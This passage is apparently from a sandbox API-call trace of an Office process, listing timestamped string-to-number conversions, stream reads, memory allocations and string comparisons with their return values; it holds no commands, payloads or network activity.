(in: strIn="10782", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.542] VarI4FromStr (in: strIn="10784", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.542] VarR8FromStr (in: strIn="15226.467674214", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.542] VarR4FromR8 (in: dblIn=0xdcbfa728, pfltOut=0x40cdbd3b | out: pfltOut=0x40cdbd3b) returned 0x0 [0059.542] VarI4FromStr (in: strIn="15200", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.542] VarR8FromStr (in: strIn="15226.467674214", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.542] VarR4FromR8 (in: dblIn=0xdcbfa728, pfltOut=0x40cdbd3b | out: pfltOut=0x40cdbd3b) returned 0x0 [0059.542] VarR8FromStr (in: strIn="15226.467674214", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.542] VarR4FromR8 (in: dblIn=0xdcbfa728, pfltOut=0x40cdbd3b | out: pfltOut=0x40cdbd3b) returned 0x0 [0059.542] VarI4FromStr (in: strIn="10782", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.542] VarI4FromStr (in: strIn="10784", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.542] VarR8FromStr (in: strIn="40651.926011179", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.543] VarR4FromR8 (in: dblIn=0xa1e23231, pfltOut=0x40e3d97d | out: pfltOut=0x40e3d97d) returned 0x0 [0059.543] VarI4FromStr (in: strIn="15200", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.543] VarR8FromStr (in: strIn="40651.926011179", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.543] VarR4FromR8 (in: dblIn=0xa1e23231, pfltOut=0x40e3d97d | out: pfltOut=0x40e3d97d) returned 0x0 [0059.543] CExposedStream::Read () returned 0x0 [0059.543] CExposedStream::Read () returned 0x0 [0059.543] VarI4FromStr (in: strIn="10782", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.543] VarI4FromStr (in: strIn="10784", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.543] VarI4FromStr (in: strIn="15200", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.543] VarI4FromStr (in: strIn="1098559462", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.543] VarI4FromStr (in: strIn="18616", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.543] VarI4FromStr (in: strIn="24324", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarI4FromStr (in: strIn="12162", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarI4FromStr (in: strIn="18616", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarI4FromStr (in: strIn="24324", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarI4FromStr (in: strIn="12162", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarR8FromStr (in: strIn="2278.3043629279", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.544] VarR4FromR8 (in: dblIn=0xd5752ae4, pfltOut=0x40a1cc9b | out: pfltOut=0x40a1cc9b) returned 0x0 [0059.544] VarI4FromStr (in: strIn="30811", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarR8FromStr (in: strIn="42814.94363223", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.544] VarR4FromR8 (in: dblIn=0x323c37ea, pfltOut=0x40e4e7de | out: pfltOut=0x40e4e7de) returned 0x0 [0059.544] VarI4FromStr (in: strIn="18616", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarI4FromStr (in: strIn="24324", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.544] VarI4FromStr (in: strIn="12162", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] VarR8FromStr (in: strIn="28353.078676363", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.545] VarR4FromR8 (in: dblIn=0x9089583, pfltOut=0x40dbb045 | out: pfltOut=0x40dbb045) returned 0x0 [0059.545] VarI4FromStr (in: strIn="201623616", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] VarI4FromStr (in: strIn="201623616", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] CRetailMalloc_Realloc () returned 0x88863e0 [0059.545] VarI4FromStr (in: strIn="18616", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] VarI4FromStr (in: strIn="24324", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] VarI4FromStr (in: strIn="12162", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] VarI4FromStr (in: strIn="19504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] VarI4FromStr (in: strIn="19504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.545] VarR8FromStr (in: strIn="62645.767306204", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.546] VarR4FromR8 (in: dblIn=0x8dc5bd86, pfltOut=0x40ee96b8 | out: pfltOut=0x40ee96b8) returned 0x0 [0059.546] VarI4FromStr (in: strIn="19504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.546] VarR8FromStr (in: strIn="48548.590521079", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.546] VarR4FromR8 (in: dblIn=0xe58c763d, pfltOut=0x40e7b492 | out: pfltOut=0x40e7b492) returned 0x0 [0059.546] VarI4FromStr (in: strIn="32448", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.546] VarI4FromStr (in: strIn="1915834740", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.546] VarR8FromStr (in: strIn="48548.590521079", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.546] VarR4FromR8 (in: dblIn=0xe58c763d, pfltOut=0x40e7b492 | out: pfltOut=0x40e7b492) returned 0x0 [0059.546] VarI4FromStr (in: strIn="19504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.546] VarI4FromStr (in: strIn="7739098", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.547] VarR8FromStr (in: strIn="61934.634522289", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.547] VarR4FromR8 (in: dblIn=0x4e01affb, pfltOut=0x40ee3dd4 | out: pfltOut=0x40ee3dd4) returned 0x0 [0059.547] VarI4FromStr (in: strIn="19504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.547] VarR8FromStr (in: strIn="6457.0284638283", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.547] VarR4FromR8 (in: dblIn=0x4967cbab, pfltOut=0x40b93907 | out: pfltOut=0x40b93907) returned 0x0 [0059.547] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="iPad" | out: _Dst="iPad") returned 0x0 [0059.547] VarI4FromStr (in: strIn="15540", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.547] VarI4FromStr (in: strIn="18468", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.547] VarR8FromStr (in: strIn="16417.611121573", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.548] VarR4FromR8 (in: dblIn=0x1c9da87b, pfltOut=0x40d00867 | out: pfltOut=0x40d00867) returned 0x0 [0059.548] VarI4FromStr (in: strIn="18468", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.548] VarI4FromStr (in: strIn="908233594", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.548] VarI4FromStr (in: strIn="18468", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.548] VarR8FromStr (in: strIn="35818.237429756", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.548] VarR4FromR8 (in: dblIn=0x990649a4, pfltOut=0x40e17d47 | out: pfltOut=0x40e17d47) returned 0x0 [0059.548] VarR8FromStr (in: strIn="26466.54430126", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.548] VarR4FromR8 (in: dblIn=0xd5d4f3b8, pfltOut=0x40d9d8a2 | out: pfltOut=0x40d9d8a2) returned 0x0 [0059.548] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="BymDG7o" | out: _Dst="BymDG7o") returned 0x0 [0059.548] CExposedStream::Read () returned 0x0 [0059.573] CRetailMalloc_Realloc () returned 0x88863e0 [0059.573] CExposedStream::Release () returned 0x1 [0059.573] CExposedStream::Release () returned 0x0 [0059.574] CRetailMalloc_Realloc () returned 0x87fb9c0 [0059.575] CRetailMalloc_Alloc () returned 0x8841f68 [0059.575] CRetailMalloc_Alloc () returned 0x6178e00 [0059.575] CRetailMalloc_Alloc () returned 0x867b898 [0059.575] CRetailMalloc_Realloc () returned 0x8680ba0 [0059.575] CRetailMalloc_Realloc () returned 0x880dc00 [0059.575] CRetailMalloc_Realloc () returned 0x87502e0 [0059.576] CRetailMalloc_Alloc () returned 0x6178d88 [0059.576] CRetailMalloc_Free () returned 0xad0001 [0059.576] CRetailMalloc_Alloc () returned 0x88111b8 [0059.576] CRetailMalloc_Realloc () returned 0x883de10 [0059.576] CRetailMalloc_Free () returned 0x1880001 [0059.576] CRetailMalloc_Alloc () returned 0x887bca8 [0059.576] CRetailMalloc_Alloc () returned 0x88111b8 [0059.576] CRetailMalloc_Alloc () returned 0x87fc0e0 [0059.576] CRetailMalloc_Alloc () returned 0x87eba78 [0059.576] CRetailMalloc_Alloc () returned 0x86e5fe8 [0059.576] CRetailMalloc_Alloc () returned 0x86e6048 [0059.576] CRetailMalloc_Alloc () returned 0x876cb38 [0059.576] CRetailMalloc_Free () returned 0x1c0001 [0059.577] CExposedDocFile::AddRef () returned 0x6 [0059.577] CExposedDocFile::OpenStream () returned 0x0 [0059.577] CExposedDocFile::Release () returned 0x6 [0059.577] CExposedStream::Seek () returned 0x0 [0059.577] CRetailMalloc_Alloc () returned 0x887bf18 [0059.577] CRetailMalloc_Alloc () returned 0x87ebb88 [0059.577] CRetailMalloc_Alloc () returned 0x887c538 [0059.577] CRetailMalloc_Alloc () returned 0x8811050 [0059.577] CRetailMalloc_Alloc () returned 0x86e6058 [0059.577] CRetailMalloc_Alloc () returned 0x86e6068 [0059.577] CRetailMalloc_Alloc () returned 0x88114b0 [0059.577] CRetailMalloc_Alloc () returned 0x87ebc10 [0059.577] CExposedStream::AddRef () returned 0x2 [0059.577] CExposedStream::Read () returned 0x0 [0059.577] CExposedStream::AddRef () returned 0x3 [0059.577] CExposedStream::Release () returned 0x2 [0059.577] CRetailMalloc_Alloc () returned 0x8898da8 [0059.577] CExposedStream::Read () returned 0x0 [0059.578] CExposedStream::Read () returned 0x0 [0059.578] CRetailMalloc_Alloc () returned 0x86e6078 [0059.578] CRetailMalloc_Alloc () returned 0x87fc0c8 [0059.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x86e6078, cbMultiByte=6, lpWideCharStr=0x87fc0c8, cchWideChar=6 | out: lpWideCharStr="xZvX7") returned 6 [0059.578] CRetailMalloc_Free () returned 0x3ae0201 [0059.578] CRetailMalloc_Free () returned 0x60e0301 [0059.579] atoi (_Str="944") returned 944 [0059.579] atoi (_Str="25") returned 25 [0059.579] atoi (_Str="4016") returned 4016 [0059.579] atoi (_Str="2008") returned 2008 [0059.579] atoi (_Str="52") returned 52 [0059.579] VarI4FromStr (in: strIn="1988508626", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.580] VarI4FromStr (in: strIn="22074", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.580] atoi (_Str="1698") returned 1698 [0059.580] atoi (_Str="4016") returned 4016 [0059.580] atoi (_Str="2008") returned 2008 [0059.580] CRetailMalloc_Realloc () returned 0x779d1d8 [0059.580] VarR8FromStr (in: strIn="10941.927802262", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.581] VarR4FromR8 (in: dblIn=0xc2397a39, pfltOut=0x40c55ef6 | out: pfltOut=0x40c55ef6) returned 0x0 [0059.581] atoi (_Str="564") returned 564 [0059.581] atoi (_Str="591") returned 591 [0059.581] atoi (_Str="42") returned 42 [0059.582] VarI4FromStr (in: strIn="22074", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.582] atoi (_Str="1698") returned 1698 [0059.582] atoi (_Str="4016") returned 4016 [0059.583] atoi (_Str="2008") returned 2008 [0059.583] VarR8FromStr (in: strIn="23120.040586918", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.583] VarR4FromR8 (in: dblIn=0x98f9df5d, pfltOut=0x40d69402 | out: pfltOut=0x40d69402) returned 0x0 [0059.583] atoi (_Str="564") returned 564 [0059.583] atoi (_Str="591") returned 591 [0059.583] CRetailMalloc_Realloc () returned 0x87163e0 [0059.584] atoi (_Str="8758") returned 8758 [0059.584] atoi (_Str="151") returned 151 [0059.584] VarI4FromStr (in: strIn="25901", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.584] atoi (_Str="944") returned 944 [0059.584] atoi (_Str="25") returned 25 [0059.584] atoi (_Str="4016") returned 4016 [0059.584] atoi (_Str="2008") returned 2008 [0059.585] atoi (_Str="155") returned 155 [0059.585] atoi (_Str="69") returned 69 [0059.585] VarI4FromStr (in: strIn="29916", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.585] atoi (_Str="4986") returned 4986 [0059.585] VarI4FromStr (in: strIn="21648", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.586] VarI4FromStr (in: strIn="18766", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.586] atoi (_Str="853") returned 853 [0059.586] VarI4FromStr (in: strIn="658645860", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.586] atoi (_Str="522") returned 522 [0059.586] atoi (_Str="474") returned 474 [0059.586] VarR8FromStr (in: strIn="62651.314951196", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.586] VarR4FromR8 (in: dblIn=0x141487d5, pfltOut=0x40ee976a | out: pfltOut=0x40ee976a) returned 0x0 [0059.586] VarR8FromStr (in: strIn="7464.0195342683", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.587] VarR4FromR8 (in: dblIn=0x32a380, pfltOut=0x40bd2805 | out: pfltOut=0x40bd2805) returned 0x0 [0059.587] CRetailMalloc_Realloc () returned 0x6210a88 [0059.587] atoi (_Str="155") returned 155 [0059.587] atoi (_Str="69") returned 69 [0059.587] VarI4FromStr (in: strIn="29916", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.587] atoi (_Str="4986") returned 4986 [0059.587] VarI4FromStr (in: strIn="12440", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.588] VarI4FromStr (in: strIn="18766", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.588] atoi (_Str="853") returned 853 [0059.588] VarR8FromStr (in: strIn="60193.197760091", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.588] VarR4FromR8 (in: dblIn=0x540cf86a, pfltOut=0x40ed6426 | out: pfltOut=0x40ed6426) returned 0x0 [0059.588] atoi (_Str="155") returned 155 [0059.588] atoi (_Str="69") returned 69 [0059.588] VarI4FromStr (in: strIn="29916", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.588] atoi (_Str="4986") returned 4986 [0059.589] atoi (_Str="120") returned 120 [0059.589] VarI4FromStr (in: strIn="18766", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.589] atoi (_Str="853") returned 853 [0059.589] VarI4FromStr (in: strIn="317286526", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.589] atoi (_Str="522") returned 522 [0059.589] atoi (_Str="474") returned 474 [0059.590] atoi (_Str="155") returned 155 [0059.590] atoi (_Str="69") returned 69 [0059.591] VarI4FromStr (in: strIn="29916", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.591] atoi (_Str="4986") returned 4986 [0059.591] VarR8FromStr (in: strIn="16458.932269523", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.591] VarR4FromR8 (in: dblIn=0xaa4dca16, pfltOut=0x40d012bb | out: pfltOut=0x40d012bb) returned 0x0 [0059.591] VarI4FromStr (in: strIn="18766", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.591] atoi (_Str="853") returned 853 [0059.591] atoi (_Str="522") returned 522 [0059.591] atoi (_Str="474") returned 474 [0059.592] VarR8FromStr (in: strIn="60035.73491805", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.592] VarR4FromR8 (in: dblIn=0x8472dbc0, pfltOut=0x40ed5077 | out: pfltOut=0x40ed5077) returned 0x0 [0059.592] atoi (_Str="776") returned 776 [0059.592] atoi (_Str="1") returned 1 [0059.592] atoi (_Str="6939") returned 6939 [0059.592] atoi (_Str="771") returned 771 [0059.593] atoi (_Str="51") returned 51 [0059.593] atoi (_Str="372") returned 372 [0059.593] atoi (_Str="273") returned 273 [0059.593] atoi (_Str="6939") returned 6939 [0059.593] atoi (_Str="771") returned 771 [0059.594] VarR8FromStr (in: strIn="18856.645137773", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.594] VarR4FromR8 (in: dblIn=0x49eff11d, pfltOut=0x40d26a29 | out: pfltOut=0x40d26a29) returned 0x0 [0059.594] atoi (_Str="372") returned 372 [0059.594] atoi (_Str="273") returned 273 [0059.594] CRetailMalloc_Realloc () returned 0x76fc6a8 [0059.594] atoi (_Str="6939") returned 6939 [0059.594] atoi (_Str="771") returned 771 [0059.594] atoi (_Str="0") returned 0 [0059.595] atoi (_Str="817") returned 817 [0059.595] atoi (_Str="833") returned 833 [0059.595] VarR8FromStr (in: strIn="19380.763222644", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.595] VarR4FromR8 (in: dblIn=0xd8a3c9e3, pfltOut=0x40d2ed30 | out: pfltOut=0x40d2ed30) returned 0x0 [0059.595] atoi (_Str="428") returned 428 [0059.595] atoi (_Str="367") returned 367 [0059.595] atoi (_Str="776") returned 776 [0059.595] atoi (_Str="1") returned 1 [0059.596] atoi (_Str="6939") returned 6939 [0059.596] atoi (_Str="771") returned 771 [0059.596] VarR8FromStr (in: strIn="18199.558588743", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.596] VarR4FromR8 (in: dblIn=0xbfeaffc6, pfltOut=0x40d1c5e3 | out: pfltOut=0x40d1c5e3) returned 0x0 [0059.596] atoi (_Str="315") returned 315 [0059.596] atoi (_Str="357") returned 357 [0059.597] VarI4FromStr (in: strIn="22808", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.597] atoi (_Str="2851") returned 2851 [0059.597] atoi (_Str="0") returned 0 [0059.597] atoi (_Str="1030") returned 1030 [0059.597] atoi (_Str="1046") returned 1046 [0059.597] VarR8FromStr (in: strIn="54876.321988902", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.597] VarR4FromR8 (in: dblIn=0x4dbbab78, pfltOut=0x40eacb8a | out: pfltOut=0x40eacb8a) returned 0x0 [0059.597] VarI4FromStr (in: strIn="25824", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.598] atoi (_Str="538") returned 538 [0059.598] atoi (_Str="0") returned 0 [0059.598] VarI4FromStr (in: strIn="24356", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.598] atoi (_Str="523") returned 523 [0059.598] atoi (_Str="9") returned 9 [0059.598] VarI4FromStr (in: strIn="22808", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.598] atoi (_Str="2851") returned 2851 [0059.599] atoi (_Str="315") returned 315 [0059.599] atoi (_Str="357") returned 357 [0059.599] VarI4FromStr (in: strIn="22808", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.599] atoi (_Str="2851") returned 2851 [0059.599] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Mer8CN5f9", cchCount1=-1, lpString2="LEo4i", cchCount2=-1) returned 3 [0059.600] atoi (_Str="1030") returned 1030 [0059.600] atoi (_Str="1046") returned 1046 [0059.600] atoi (_Str="0") returned 0 [0059.600] VarI4FromStr (in: strIn="25824", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.600] atoi (_Str="538") returned 538 [0059.600] atoi (_Str="0") returned 0 [0059.600] VarR8FromStr (in: strIn="57251.827889494", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.600] VarR4FromR8 (in: dblIn=0x7e121bae, pfltOut=0x40ebf47a | out: pfltOut=0x40ebf47a) returned 0x0 [0059.601] atoi (_Str="315") returned 315 [0059.601] atoi (_Str="357") returned 357 [0059.601] VarI4FromStr (in: strIn="22808", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.601] atoi (_Str="2851") returned 2851 [0059.601] atoi (_Str="113") returned 113 [0059.601] atoi (_Str="1030") returned 1030 [0059.601] atoi (_Str="1046") returned 1046 [0059.601] atoi (_Str="113") returned 113 [0059.602] VarI4FromStr (in: strIn="25824", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.602] atoi (_Str="538") returned 538 [0059.602] VarI4FromStr (in: strIn="11354", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.602] VarI4FromStr (in: strIn="11354", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.602] atoi (_Str="833") returned 833 [0059.602] atoi (_Str="869") returned 869 [0059.603] atoi (_Str="345") returned 345 [0059.603] atoi (_Str="352") returned 352 [0059.603] atoi (_Str="0") returned 0 [0059.603] atoi (_Str="7266") returned 7266 [0059.603] atoi (_Str="346") returned 346 [0059.603] atoi (_Str="5694") returned 5694 [0059.603] atoi (_Str="833") returned 833 [0059.603] atoi (_Str="869") returned 869 [0059.604] atoi (_Str="345") returned 345 [0059.604] atoi (_Str="352") returned 352 [0059.604] VarR8FromStr (in: strIn="55179.322500623", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.604] VarR4FromR8 (in: dblIn=0x51ecd397, pfltOut=0x40eaf16a | out: pfltOut=0x40eaf16a) returned 0x0 [0059.604] atoi (_Str="7266") returned 7266 [0059.604] atoi (_Str="346") returned 346 [0059.604] atoi (_Str="404") returned 404 [0059.605] atoi (_Str="459") returned 459 [0059.605] VarI4FromStr (in: strIn="12025", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.605] atoi (_Str="13") returned 13 [0059.605] atoi (_Str="345") returned 345 [0059.605] atoi (_Str="352") returned 352 [0059.605] VarI4FromStr (in: strIn="32071", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.605] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OPQ7rxuod", cchCount1=-1, lpString2="axSQP0dJ", cchCount2=-1) returned 3 [0059.605] atoi (_Str="2750") returned 2750 [0059.617] atoi (_Str="2761") returned 2761 [0059.617] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OPQ7rxuod", cchCount1=-1, lpString2="axSQP0dJ", cchCount2=-1) returned 3 [0059.617] VarI4FromStr (in: strIn="20504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.617] atoi (_Str="1864") returned 1864 [0059.617] VarR8FromStr (in: strIn="40984.288624491", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.617] VarR4FromR8 (in: dblIn=0x3c696db5, pfltOut=0x40e40309 | out: pfltOut=0x40e40309) returned 0x0 [0059.617] atoi (_Str="547") returned 547 [0059.617] atoi (_Str="593") returned 593 [0059.617] CRetailMalloc_Realloc () returned 0x7426110 [0059.617] VarI4FromStr (in: strIn="20504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.617] atoi (_Str="1864") returned 1864 [0059.617] atoi (_Str="547") returned 547 [0059.618] atoi (_Str="593") returned 593 [0059.618] VarI4FromStr (in: strIn="20504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.618] atoi (_Str="1864") returned 1864 [0059.618] VarI4FromStr (in: strIn="54353914", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.618] atoi (_Str="2750") returned 2750 [0059.618] atoi (_Str="2761") returned 2761 [0059.618] VarI4FromStr (in: strIn="20504", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.618] atoi (_Str="1864") returned 1864 [0059.618] atoi (_Str="241") returned 241 [0059.618] atoi (_Str="911") returned 911 [0059.618] atoi (_Str="885") returned 885 [0059.618] VarR8FromStr (in: strIn="53188.320508982", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.618] VarR4FromR8 (in: dblIn=0x419c0d78, pfltOut=0x40e9f88a | out: 